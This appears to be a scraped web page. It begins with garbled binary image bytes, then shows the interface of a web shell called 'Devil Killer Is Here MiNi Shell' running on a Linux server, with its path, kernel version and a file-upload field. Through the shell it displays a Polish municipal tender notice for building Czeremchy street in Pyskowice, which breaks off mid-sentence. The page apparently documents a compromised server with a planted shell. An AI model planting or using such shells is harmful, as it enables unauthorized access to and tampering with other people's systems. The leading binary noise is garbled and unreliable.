JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220223/0006644601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa ulicy Czeremchy w Pyskowicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Pyskowice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276257593</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Strzelców Bytomskich 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pyskowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-120</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmpyskowice@pyskowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.pyskowice.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa ulicy Czeremchy w Pyskowicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-45433186-94ac-11ec-94c8-de8df8ed9da1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00066446</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00002618/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa ulicy Czeremchy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-zp.pyskowice.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Z zastrzeżeniem postanowień zawartych w rozdziale X SWZ oraz w pkt 2 i w pkt 4 rozdziału V SWZ,<br/>komunikacja między Zamawiającym a Wykonawcami może się odbywać wyłącznie przy użyciu<br/>środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług<br/>drogą elektroniczną (Dz. U. z 2020 r. poz. 344), tj:<br/>1.1. poprzez „System e-ZP” pod adresem: https://e-zp.pyskowice.pl/ w pozycji oznaczonej tytułem<br/>oraz znakiem niniejszego postępowania lub zgodnie z wyborem wykonawcy.<br/>1.2. pocztą elektroniczną na adres e-mail: gmpyskowice@pyskowice.pl<br/>2. Ofertę składa się pod rygorem nieważności, zgodnie z wyborem Wykonawcy:<br/>2.1. w formie elektronicznej (oznacza to postać elektroniczną opatrzoną kwalifikowanym podpisem<br/>elektronicznym),<br/>2.2. w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym<br/>- wyłącznie poprzez „System e-ZP”.<br/>Szczegółowe informacje w rodz. V SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto w Systemie e-ZP. Rejestracja i korzystanie z Systemu e-ZP jest bezpłatne.<br/>Obowiązkiem Wykonawcy jest zapoznawanie się z regulaminem użytkowania „Systemu e-ZP”<br/>zamieszczonym na stronie https://e-zp.pyskowice.pl/. Wykonawca posiadający przedmiotowe konto ma<br/>możliwość złożenia, wycofania oferty oraz składania wniosków o wyjaśnienie treści SWZ. Wykonawca<br/>niezarejestrowany może jedynie przeglądać treści udostępniane w części publicznej Systemu.<br/>2. W Systemie e-ZP znajdują się także instrukcja dla Wykonawcy (Instrukcja obsługi Systemu FINN e-<br/>Zamówienia Publiczne) oraz filmy instruktażowe - prezentujące podstawowe czynności dokonywane<br/>przez Wykonawców za pomocą Systemu (rejestracja, zadawanie pytań, złożenie oferty, wycofanie<br/>oferty). Wykonawca ma obowiązek zapoznawania się z tą instrukcją. Instrukcja dostępna jest pod<br/>adresem: https://pomoc.e-zp.finn.pl/<br/>3. Zamawiający informuje, iż w przypadku przesłania przez Wykonawcę dokumentów elektronicznych<br/>skompresowanych (w tym oferta przetargowa), dopuszczone są jedynie formaty danych wskazanych w<br/>Rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci<br/>elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz. U. z 2017 r. poz. 2247). Powyższe oznacza, iż Zamawiający nie dopuszcza przesyłania dokumentów elektronicznych (w<br/>tym oferty) skompresowanych np. formatem .rar<br/>4. Kwalifikowany podpis elektroniczny musi być wystawiony przez dostawcę kwalifikowanej usługi<br/>zaufania, będącego podmiotem świadczącym usługi certyfikacyjne – podpis elektroniczny, spełniające<br/>wymogi bezpieczeństwa określone w ustawie z dnia 5 września 2016 r. o usługach zaufania oraz<br/>identyfikacji elektronicznej (Dz. U. 2016 poz. 1579).<br/>5. Wykonawca składa ofertę udziału w postępowaniu za pośrednictwem funkcji formularzy do złożenia,<br/>wycofania oferty lub wniosku. Wysłana oferta w trybie podstawowym jest automatycznie szyfrowana i<br/>chroniona terminem otwarcia.<br/>6. Wykonawca może przed upływem terminu do składania ofert, za pośrednictwem dedykowanego<br/>mechanizmu wycofać ofertę. Mechanizm wycofania oferty został opisany w funkcji Systemu „Pomoc”.<br/>7. Za datę przekazania i odebrania oferty udziału w postępowaniu oraz zawiadomień, dokumentów<br/>elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych<br/>informacji przyjmuje się datę wystawienia UPP przez system. Wynikiem złożenia/wysłania<br/>(zakończonego sukcesem czyli odbiorem) przesyłki przez Wykonawcę jest wygenerowanie<br/>Urzędowego Poświadczenia Przedłożenia (UPP). Należy zwrócić szczególną uwagę na to, iż System<br/>potwierdzi złożenie oferty lub innego dokumentu po pełnym zakończeniu transakcji wysyłki i zapisu<br/>przekazanych danych. UPP jest widoczne w wysłanej wiadomości. Pozostałe wymagania zgodne z<br/>rozdz. VI SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zg. z art.13ust.1 i 2rozp. Parlamentu Europejskiego i<br/>Rady (UE) 2016/679 z dnia 27.04. 2016r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osob. i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE dalej „RODO”, Zam.infor.,że:<br/>1)administratorem Pani/a danych osobowych jest Burmistrz Miasta Pyskowice; może Pani/Pan uzyskać<br/>inf. o przetwarzaniu Pani/a danych osobowych w UM w Pyskowicach, ul. Strzelców Bytomskich<br/>3;2)inspektorem ochrony danych jest Pan Dawid Ślusarek, email: iod@pyskowice.pl; tel. (32)<br/>3326103;3)dane osobowe przetwarzane będą na podst. art. 6 ust. 1 lit. cRODO w celu związanym z<br/>postęp. o udzielenie zam. publ. zwany dalej postep.odbiorcami Pani/a danych osob. będą osoby lub<br/>podmioty, którym udostępniona zostanie dok. postęp. w oparciu o art. 18 oraz art. 74 ust. 1 ustawy<br/>Pzp;4) Dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od<br/>dnia zakończenia postęp. o udzielenie zam., a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy; zgodnie z Rozp.Prezesa Rady Ministrów z 18.01.<br/>2011 r. w spr. instrukcji kanc., jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji<br/>i zakresu działania archiwów zakładowych (DzU 2011 nr14 poz.67ze zm.) teczki aktowe będą<br/>przechowywane w archiwum zakładowym przez okres 5 lat w przypadku dokumentacji zam. publ. oraz<br/>10 lat w przypadku umów zawartych w wyniku postęp. w trybie zam. publ.;5)obow. podania przez<br/>Panią/a danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w ustawie Pzp, związanym z udziałem w postęp. o udzielenie zam. pub.; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;6)w odniesieniu do Pani/a danych osobowych<br/>decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;7)posiada<br/>Pani/Pan:na podst. art. 15RODOprawo dostępu do danych osobowych Pani/a dotyczących;w<br/>przypadku, gdy wykonanie obow., o których mowa w art. 15 ust. 1-3RODOwymagałoby<br/>niewspółmiernie dużego wysiłku, Zam. może żądać od osoby, której dane dotyczą, wskazania<br/>dodatkowych inf. mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty<br/>postęp. o udzielenie zam. publ.;w przypadku, gdy wykonanie obowiązków, o których mowa w art.15<br/>ust.1-3RODOwymagałoby niewspółmiernie dużego wysiłku, Zam. może żądać od osoby, której dane<br/>dotyczą, wskazania dodatkowych inf. mających w szczególności na celu sprecyzowanie nazwy lub daty zakończonego postęp. o udzielenie zam. publ.; na podst. art.16RODOprawo do sprostowania Pani/a<br/>danych osobowych (przy czym korzystanie z prawa do sprostowania nie może skutkować zmianą<br/>wyniku postęp. o udzielenie zam. publ. ani zmianą postanowień umowy w zakresie niezgodnym z<br/>ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników)na podstawie<br/>art.18RODOprawo żądania od administratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem przypadków, o których mowa w art.18ust. 2RODO(przy czym prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>wystąpienie z żądaniem, o którym mowa w art. 18ust. 1RODO,nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia postęp. o udzielenie zam. publ.prawo do wniesienia skargi do<br/>Prezesa UODO osobowych, jeśli uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana<br/>dotyczących narusza przepisy RODO;8) nie przysługuje Pani/u:w związku z art.17ust.3 lit.b,d lub<br/>eRODO prawo do usunięcia danych osobowych; prawo do przenoszenia danych osobowych, o którym<br/>mowa w art. 20RODO;na podst. art. 21RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podst. prawną przetwarzania Pani/a danych osobowych jest art.6ust.1 lit.cRODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.003.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest budowa ul. Czeremchy w Pyskowicach wraz z przebudową<br/>i zabezpieczeniem linii kablowej nN i SN oraz wymianą opraw oświetlenia ulicznego wraz z dobudową<br/>słupów i odcinka linii kablowej nN.<br/>6/34<br/>2. Zakres zamówienia:<br/>Prace objęte niniejszym postępowaniem obejmują wykonanie następujących robót:<br/>1) Zakres prac drogowych obejmuje między innymi:<br/>a) demontaż drogi z płyt drogowych i przewóz na odległość do 0,5 km - 1 373,10 m2,<br/>b) wykonanie koryta pod drogę, chodniki i zjazdy indywidualnego, wywóz<br/>i utylizacja na własny koszt gruntu z korytowania - 3 338,62 m3 ,<br/>c) ułożenie drenażu z rur z tworzywa sztucznego z filtrem z włókna syntetycznego<br/>ø 113/126 mm - 704 ,00 m,<br/>d) wykonanie studni ściekowych ulicznych - 14,00 kpl,<br/>e) wzmocnienie podłoża gruntowego geowłókniną - 4 508,89 m2,<br/>f) wykonanie warstwy odsączającej grubości po zagęszczeniu 10,00 cm - 4 767,24 m2,<br/>g) wykonanie podbudowy z kruszywa łamanego, warstwa dolna,<br/>grubość po zagęszczeniu 25 cm - 4 767,24 m2,<br/>h) wykonanie podbudowy z kruszywa łamanego , warstwa górna,<br/>grubość po zagęszczeniu 15 cm - 4 376,44 m2,<br/>i) wykonanie podbudowy z kruszywa łamanego , warstwa górna,<br/>grubość po zagęszczeniu 10 cm - 2 744,39 m2,<br/>j) układanie krawężników betonowych, wystających 15x30 cm na ławie z oporem - 641,76 m,<br/>k) układanie krawężników betonowych, najazdowych 20x22 cm na ławie z oporem - 176,13 m,<br/>l) układanie obrzeży betonowych, 30x8 cm, na ławie z oporem obustronnym - 849,16 m,<br/>ł) wykonanie nawierzchni z kostki brukowej betonowej, grubość 8·cm,<br/>na podsypce cementowo-piaskowej, kostka szara - 3 894,55 m2,<br/>m) wykonanie nawierzchni z kostki brukowej betonowej, grubość 8·cm,<br/>na podsypce cementowo-piaskowej, kostka kolor - czerwona - 481,89 m2,<br/>2) Zakres prac elektrycznych – przebudowa linii kablowych nN i SN obejmuje między innymi:<br/>a) przebudowa linii kablowych nN YAKY 4x240 mm2 - 138,0 m,<br/>b) przebudowa linii kablowych SN XRUHAKXS 3x1x120 mm2 - 10,0 m,<br/>c) montaż rur ochronnych PS 110, PS 160, DVK 160, DVK 110 i SRS 110 - 349,0 m.<br/>d) Należy uzyskać zgodę na wymagane odpłatne wyłączenia odpowiednich urządzeń energetycznych<br/>oraz ustalić nadzór służb energetycznych. Na czas wykonywania przebudowy należy zapewnić<br/>ciągłość zasilania istniejących obwodów , zasilanie tymczasowe lub agregaty prądotwórcze.<br/>e) Dla linii kablowych SN należy wykonać pomiar wyładowań niezupełnych.<br/>f) Wszystkie prace należy wykonać zgodnie z warunki techniczne usunięcia kolizji sieci<br/>elektroenergetycznej z dnia 16.09.2019 r. sygnatura: TD/OGL/OME/K/WT/KB/362/2019<br/>i z dnia 08.09.2021 r. sygnatura: TD/OGL/OME/K/WT/KB/362/2019 – aktualizacja .<br/>3) Zakres prac elektrycznych – oświetlenie uliczne obejmuje między innymi:<br/>a) demontaż starych opraw i montaż nowych wysięgników rurowych i opraw<br/>LED 50W na istniejących słupach - 9,0 kpl<br/>b) montaż słupów oświetleniowych wraz z wysięgnikami rurowymi<br/>i oprawami LED 50 W - 3,0 kpl<br/>c) montaż kabli YAKY 4 x 35 mm2 - 115,0 m<br/>d) montaż rur ochronnych PS 110, PS 160, DVK 160, DVK 110 i SRS 110 - 20,0 m.<br/>Szczegółowy zakres robót określają:<br/>• projekty architektoniczno – budowlany, projekt zagospodarowania terenu „Budowa ul. Czeremchy<br/>w Pyskowicach” stanowiący załącznik nr 5a<br/>1) Opis techniczny,<br/>2) Projekt zagospodarowania terenu (Branża: drogowa) - nr rysunku 1 a,<br/>3) Projekt zagospodarowania terenu (Branża: sanitarna) - nr rysunku 1 c, 4) Projekt zagospodarowania terenu (Branża: PZT) - nr rysunku 1 d,<br/>5) Przekrój B-B - nr rysunku 2,<br/>6) Przekrój C-C - nr rysunku 3,<br/>7) Przekrój D-D - nr rysunku 4,<br/>8) Przekrój E-E - nr rysunku 5,<br/>9) Profil podłużny – ul. Czeremchy - nr rysunku W 01,<br/>10) Wpust uliczny - nr rysunku W 02,<br/>11) Uzgodnienia – Pismo z dnia 24.05.2021 r. Polska Spółka Gazownictwa Sp. z o. o.<br/>12) Uzgodnienia – Pismo z dnia 08.04.2021 r. Netia SA.<br/>13) Uzgodnienia – Pismo z dnia 22.05.2021 r. Orange Polska.<br/>14) Uzgodnienia – Pismo z dnia 12.04.2021 r. Tauron dystrybucja S. A.<br/>• projekt geotechniczny dla ustalenia geotechnicznych warunków posadowienia na potrzeby projektu<br/>budowy ulicy Czeremchy w Pyskowicach stanowiący załącznik nr 5b<br/>1) Opis geotechniczny.<br/>2) Dokumentacja z badań podłoża.<br/>• projekt docelowej organizacji ruchu stanowiący załącznik nr 5c<br/>1) Część opisowa.<br/>2) Docelowa organizacja ruchu. - rys. 01 DOR.<br/>• projekt budowlany „Budowa ul. Czeremchy w Pyskowicach” (Przebudowa, zabezpieczenie linii<br/>kablowych nN; SN )stanowiący załącznik nr 5d,<br/>1) Opis techniczny,<br/>2) Projekt zagospodarowania terenu - przebudowa i zabezpieczenie kabli nN oraz SN<br/>- nr rysunku 1,<br/>3) Schemat elektryczny projektowanych urządzeń - nr rysunku 2,<br/>4) Warunki techniczne usunięcia kolizji sieci elektroenergetycznej z dnia 16.09.2019 r.<br/>Sygnatura: TD/OGL/OME/K/WT/KB/362/2019<br/>5) Warunki techniczne usunięcia kolizji sieci elektroenergetycznej z dnia 08.09.2021 r.<br/>Sygnatura: TD/OGL/OME/K/WT/KB/362/2019 – aktualizacja .<br/>• Projekt budowlany „Budowa ul. Czeremchy w Pyskowicach” (Wymiana opraw oświetlenia<br/>ulicznego wraz z dobudową słupa i odcinka linii kabla nN.) stanowiący załącznik nr 5e,<br/>1) Opis techniczny,<br/>2) Lokalizacja opraw oświetlenia podlegających wymianie oraz lokalizacja projektowanego<br/>słupa - nr rysunku 1<br/>3) Schemat elektryczny projektowanych urządzeń - nr rysunku 2<br/>• projekt budowlany „Budowa oświetlenia zewnętrznego dla osiedla domków jednorodzinnych<br/>w Pyskowicach osiedle Czechowicka stanowiący załącznik nr 5f,<br/>1) Opis techniczny.<br/>2) Schemat sieci oświetleniowej ulic - nr rysunku 4<br/>3) Schemat sieci oświetleniowej ulic - nr rysunku 6<br/>4) Schemat szafki sterownia oświetlenia ulic - nr rysunku 7<br/>5) Wyciąg z planu zagospodarowania terenu p - nr rysunku 2<br/>• projekt techniczno-wykonawczy „Budowa dróg, chodników i ścieżek rowerowych przy ul.<br/>Czechowickiej i Wolności w Pyskowicach stanowiący załącznik nr 5g,<br/>1) Wyciąg z planu sytuacyjno wysokościowego<br/>(z zaznaczonym zakresem robót ) - nr rys 18/2/B1-1.0<br/>• przedmiar robót stanowiący załącznik nr 6 do SWZ<br/>• specyfikacje techniczne – Budowa ul. Czeremchy w Pyskowicach<br/>(zakres :branża drogowa, branża sanitarna) stanowiąca załącznik nr 7a do SWZ<br/>• specyfikacja techniczna - Budowa ul. Czeremchy w Pyskowicach (zakres :branża elektryczna) stanowiąca załącznik nr 7b do SWZ<br/>Przedmiar robót ma charakter informacyjno – pomocniczy, gdyż ze względu na przyjętą formę<br/>wynagrodzenia ryczałtowego, Wykonawca ma obowiązek wykonać przedmiot zamówienia zgodnie<br/>z dokumentacją projektową i specyfikacjami technicznymi wykonania i odbioru robót budowlanych<br/>oraz wymaganiami określonymi we wzorze umowy. Jeżeli w SWZ Zamawiający posługuje się przedmiarem<br/>robót, to dokument ten ma jedynie na celu łatwiejsze skalkulowanie wynagrodzenia Wykonawcy.<br/>Uwagi:<br/>1) Przed wbudowaniem materiałów, Wykonawca zobligowany jest do przedłożenia ich wraz<br/>z obliczeniami, certyfikatami, deklaracjami użytkowymi itp. i uzyskania akceptacji inspektora<br/>nadzoru powołanego przez Zamawiającego.<br/>2) Przy realizacji zadania wszystkie sprawy dotyczące możliwości dojazdu sprzętem i materiałami na<br/>budowę Wykonawca winien uzgodnić z właścicielami terenu, z którego będzie korzystał.<br/>Gwarancja będzie zgodna z ofertą, przy czym minimalny wymagany okres gwarancji wynosi 5 lat licząc od<br/>dnia odbioru końcowego przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">45232130-2 - Roboty budowlane w zakresie rurociągów do odprowadzania 